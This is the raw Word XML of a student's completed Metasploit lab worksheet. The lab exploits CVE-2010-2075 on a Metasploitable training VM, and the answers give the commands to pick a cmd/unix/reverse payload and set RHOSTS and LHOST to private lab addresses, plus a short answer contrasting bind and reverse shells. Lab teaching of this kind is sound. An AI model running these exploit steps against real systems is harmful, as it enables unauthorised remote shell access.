          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">4. What command did you run to </w:t>
      </w:r>
      <w:r w:rsidR="004901B4">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>list the payloads supported by your chosen exploit?</w:t>
      </w:r>
      <w:r w:rsidR="001E579F">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (5 pts)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="785AE3D7" w14:textId="160D8C2C" w:rsidR="004901B4" w:rsidRDefault="00471C1C" w:rsidP="00743D4E">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1930"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00471C1C">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Show payloads</w:t>
      </w:r>
      <w:r w:rsidR="004901B4">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="004901B4">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>5. What command did you run to select the payload?</w:t>
      </w:r>
      <w:r w:rsidR="001E579F">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (5 pts)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DB1C7DA" w14:textId="1D596966" w:rsidR="004901B4" w:rsidRDefault="00483E6C" w:rsidP="00743D4E">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1930"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00483E6C">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">Set payload </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00483E6C">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00483E6C">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00483E6C">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>unix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00483E6C">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>/reverse</w:t>
      </w:r>
      <w:r w:rsidR="004901B4">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="004901B4">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>6. In a few sentences, describe the difference between a bind shell and a reverse shell. (10 pts)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="488CAF20" w14:textId="587CA63F" w:rsidR="004901B4" w:rsidRPr="006004D7" w:rsidRDefault="00A162EB" w:rsidP="00743D4E">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1930"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006004D7">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Bind shells have the listener running on the target and the attacker connects to the listener so it can gain remote access to the target system whereas the in the reverse shell</w:t>
      </w:r>
      <w:r w:rsidRPr="006004D7">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> the attacker has the listener running on their machine and the target connect to the attacker with a shell.  Another difference is in the Bind shell, the listener is ON </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006004D7">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>on</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006004D7">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> the </w:t>
      </w:r>
      <w:r w:rsidR="006004D7" w:rsidRPr="006004D7">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>target</w:t>
      </w:r>
      <w:r w:rsidRPr="006004D7">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> machine and the attacker connects to it but in the Reverse shell its opposite. The </w:t>
      </w:r>
      <w:r w:rsidR="006004D7" w:rsidRPr="006004D7">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">listener is ON </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006004D7" w:rsidRPr="006004D7">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>on</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006004D7" w:rsidRPr="006004D7">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> the Attacker machine and the target machine connects to it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C9155B5" w14:textId="040FF99D" w:rsidR="004901B4" w:rsidRDefault="004901B4" w:rsidP="00743D4E">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1930"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">Finally, you will need to configure the remaining options that are required by the exploit. Run a command which lists </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>all of</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> the options that have been configured. It should show that the RHOSTS and the LPORT options do not have values. Run commands to set the RHOSTS and </w:t>
      </w:r>
      <w:r w:rsidR="00450411">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>LHOST</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> options to the values required for the exploit to work successfully.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>7. What command did you run to show the exploit’s options?</w:t>
      </w:r>
      <w:r w:rsidR="001E579F">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (5 pts)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="522E2ED3" w14:textId="6AAE5595" w:rsidR="004901B4" w:rsidRDefault="006605DF" w:rsidP="00743D4E">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1930"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00483E6C" w:rsidRPr="006605DF">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>how options</w:t>
      </w:r>
      <w:r w:rsidR="004901B4">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="004901B4">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>8. What command did you run to set the value of RHOSTS?</w:t>
      </w:r>
      <w:r w:rsidR="001E579F">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (5 pts)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68808C24" w14:textId="15AA4AD7" w:rsidR="004901B4" w:rsidRPr="006605DF" w:rsidRDefault="006605DF" w:rsidP="00743D4E">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1930"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="006605DF">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>et RHOSTS 192.168.56.104</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12538CBF" w14:textId="7B56FF0E" w:rsidR="004901B4" w:rsidRDefault="004901B4" w:rsidP="00743D4E">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1930"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">9. What command did you run to set the value of </w:t>
      </w:r>
      <w:r w:rsidR="00450411">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>LHOST</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:r w:rsidR="001E579F">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (5 pts)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DE003A1" w14:textId="4D89B082" w:rsidR="004901B4" w:rsidRPr="006605DF" w:rsidRDefault="006605DF" w:rsidP="00743D4E">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1930"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006605DF">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>set LHOST 192.168.56.103</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3779065C" w14:textId="368A8909" w:rsidR="002D4749" w:rsidRDefault="002D4749" w:rsidP="00743D4E">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1930"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BB7E945" w14:textId="4357DB01" w:rsidR="00450411" w:rsidRDefault="00450411" w:rsidP="00743D4E">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1930"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Once you have configured these options, you are ready to launch the exploit. Run the exploit using the </w:t>
      </w:r>
      <w:r w:rsidRPr="00450411">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>exploit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> command. Once the exploit has completed (it may take a minute or so to finish), run the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00450411">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> command.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C79A10A" w14:textId="676C02FE" w:rsidR="00450411" w:rsidRDefault="00450411" w:rsidP="00743D4E">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1930"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4644ED39" w14:textId="4788A6C7" w:rsidR="002D4749" w:rsidRPr="000C0457" w:rsidRDefault="00450411" w:rsidP="00743D4E">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1930"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">10. Provide a screenshot showing a successful exploit of the service vulnerable to CVE-2010-2075 on the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Metasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> VM. The screenshot should also show the output of the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00195C69">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00195C69">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00195C69">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>command. (</w:t>
      </w:r>
      <w:r w:rsidR="001E579F">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>15</w:t>
      </w:r>
      <w:r w:rsidR="00195C69">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> pts)</w:t>
      </w:r>
      <w:r w:rsidR="00E8156E">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00E8156E">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00E8156E">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="001961C3">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4E03D63B" wp14:editId="043E762C">
            <wp:extent cx="4013200" cy="2667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13200" cy="2667000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00C93399">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="002D4749" w:rsidRPr="000C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46C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DEE20414"/>
    <w:lvl w:ilvl="0" w:tplc="B0A0A1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F64BB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="53123A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C9D6E56"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="974CD466"/>
    <w:lvl w:ilvl="0" w:tplc="85E88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676B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="03FE8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C359D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7526D2DA"/>
    <w:lvl w:ilvl="0" w:tplc="BA8C07B8">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E0374"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1B2A9906"/>
    <w:lvl w:ilvl="0" w:tplc="44BC2E00">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4593E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DDCED400"/>
    <w:lvl w:ilvl="0" w:tplc="ECDC38BC">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:eastAsiaTheme="minorHAnsi"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84A6E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="EE7EDF32"/>
    <w:lvl w:ilvl="0" w:tplc="ECD2BB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24F3E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D8AE1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939B4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CA42E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947804">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="396051724">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="435100801">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="436563137">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1990016261">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="533233418">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1365444750">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="683290253">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="1632900736">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="1793549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B9"/>
    <w:rsid w:val="00001058"/>
    <w:rsid w:val="0000274E"/>
    <w:rsid w:val="000050A3"/>
    <w:rsid w:val="00010F34"/>
    <w:rsid w:val="00035C4B"/>
    <w:rsid w:val="000707D6"/>
    <w:rsid w:val="0007345C"/>
    <w:rsid w:val="0007796E"/>
    <w:rsid w:val="000825AC"/>
    <w:rsid w:val="00086A6D"/>
    <w:rsid w:val="0009269E"/>
    <w:rsid w:val="000936AA"/>
    <w:rsid w:val="00096B72"/>
    <w:rsid w:val="00097140"/>
    <w:rsid w:val="000B2B2E"/>
    <w:rsid w:val="000B5384"/>
    <w:rsid w:val="000C0457"/>
    <w:rsid w:val="000C4962"/>
    <w:rsid w:val="000C561F"/>
    <w:rsid w:val="000C7E4B"/>
    <w:rsid w:val="000D0F01"/>
    <w:rsid w:val="000D2E0D"/>
    <w:rsid w:val="000F03CC"/>
    <w:rsid w:val="000F654D"/>
    <w:rsid w:val="000F70FF"/>
    <w:rsid w:val="00104AC2"/>
    <w:rsid w:val="001168C1"/>
    <w:rsid w:val="00122FA8"/>
    <w:rsid w:val="001234C7"/>
    <w:rsid w:val="00126FE9"/>
    <w:rsid w:val="00130014"/>
    <w:rsid w:val="0014057A"/>
    <w:rsid w:val="001565F8"/>
    <w:rsid w:val="00157C46"/>
    <w:rsid w:val="00195306"/>
    <w:rsid w:val="00195C69"/>
    <w:rsid w:val="001961C3"/>
    <w:rsid w:val="0019624B"/>
    <w:rsid w:val="001B30E9"/>
    <w:rsid w:val="001B60EA"/>
    <w:rsid w:val="001C36D3"/>
    <w:rsid w:val="001D5A0C"/>
    <w:rsid w:val="001D6CC7"/>
    <w:rsid w:val="001E0339"/>
    <w:rsid w:val="001E579F"/>
    <w:rsid w:val="001E61B9"/>
    <w:rsid w:val="001F2B20"/>
    <w:rsid w:val="001F769E"/>
    <w:rsid w:val="00210D5E"/>
    <w:rsid w:val="00225BB9"/>
    <w:rsid w:val="002337DD"/>
    <w:rsid w:val="0023388F"/>
    <w:rsid w:val="002547D3"/>
    <w:rsid w:val="002637B8"/>
    <w:rsid w:val="002649A8"/>
    <w:rsid w:val="0027348B"/>
    <w:rsid w:val="002822C5"/>
    <w:rsid w:val="0028295A"/>
    <w:rsid w:val="0029284A"/>
    <w:rsid w:val="002A178B"/>
    <w:rsid w:val="002C212F"/>
    <w:rsid w:val="002D1DD0"/>
    <w:rsid w:val="002D4749"/>
    <w:rsid w:val="002D4959"/>
    <w:rsid w:val="002E598F"/>
    <w:rsid w:val="002F19A8"/>
    <w:rsid w:val="002F6C5B"/>
    <w:rsid w:val="00300D23"/>
    <w:rsid w:val="0031349B"/>
    <w:rsid w:val="00314720"/>
    <w:rsid w:val="00317980"/>
    <w:rsid w:val="0032770E"/>
    <w:rsid w:val="0033703F"/>
    <w:rsid w:val="003406EC"/>
    <w:rsid w:val="00345599"/>
    <w:rsid w:val="00347352"/>
    <w:rsid w:val="00347E33"/>
    <w:rsid w:val="0035097F"/>
    <w:rsid w:val="00351A04"/>
    <w:rsid w:val="00352BF6"/>
    <w:rsid w:val="00357C9B"/>
    <w:rsid w:val="0036081B"/>
    <w:rsid w:val="00360E36"/>
    <w:rsid w:val="00375AA3"/>
    <w:rsid w:val="00375B20"/>
    <w:rsid w:val="00393E2D"/>
    <w:rsid w:val="00397DED"/>
    <w:rsid w:val="003A43D8"/>
    <w:rsid w:val="003A6887"/>
    <w:rsid w:val="003B0E59"/>
    <w:rsid w:val="003B518B"/>
    <w:rsid w:val="003C1E14"/>
    <w:rsid w:val="003D38D1"/>
    <w:rsid w:val="003E202D"/>
    <w:rsid w:val="003E3CDA"/>
    <w:rsid w:val="003F53B6"/>
    <w:rsid w:val="004009B8"/>
    <w:rsid w:val="00404797"/>
    <w:rsid w:val="004107F0"/>
    <w:rsid w:val="004270AA"/>
    <w:rsid w:val="00431F0F"/>
    <w:rsid w:val="00432B0E"/>
    <w:rsid w:val="00434F73"/>
    <w:rsid w:val="00436808"/>
    <w:rsid w:val="00450411"/>
    <w:rsid w:val="00450C88"/>
    <w:rsid w:val="004624F5"/>
    <w:rsid w:val="00471C1C"/>
    <w:rsid w:val="004720CC"/>
    <w:rsid w:val="004726C0"/>
    <w:rsid w:val="00474398"/>
    <w:rsid w:val="00480E53"/>
    <w:rsid w:val="00483E6C"/>
    <w:rsid w:val="0048790D"/>
    <w:rsid w:val="004901B4"/>
    <w:rsid w:val="004A38A7"/>
    <w:rsid w:val="004A59C7"/>
    <w:rsid w:val="004B2C9D"/>
    <w:rsid w:val="004C7BA4"/>
    <w:rsid w:val="004D6D47"/>
    <w:rsid w:val="004E141E"/>
